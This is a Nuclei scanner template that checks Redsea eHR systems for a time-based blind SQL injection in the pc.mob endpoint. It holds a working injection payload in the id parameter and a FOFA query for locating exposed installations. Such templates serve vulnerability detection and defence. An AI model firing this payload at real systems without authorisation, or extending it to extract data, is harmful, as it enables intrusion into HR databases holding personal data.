id: redsea-hrsoft-pcmob-sqli
info:
  name: 红海云 eHR 系统 pc.mob - sqli
  author: leadlife
  severity: high
  description: todo
  reference: 
    - https://github.com/wy876/POC/blob/c19942e30121f116548ca14c0375ba6c8560afeb/%E7%BA%A2%E6%B5%B7%E4%BA%91eHR%E7%B3%BB%E7%BB%9Fpc.mob%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="/RedseaPlatform/skins/images/favicon.ico"
  tags: hrsoft,sqli,redsea

http:
  - raw:
      - |
        @timeout: 15s
        GET /RedseaPlatform/goApp/pc.mob?id=1%27%20AND%20(SELECT%204802%20FROM%20(SELECT(SLEEP(6)))ndMq)%20AND%20%27NEoX%27=%27NEoX HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=905D36CF9349B41FBFB0203D2BAA8CCC
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(header,'Redsea')
          - duration >= 5 && duration < 9
        condition: and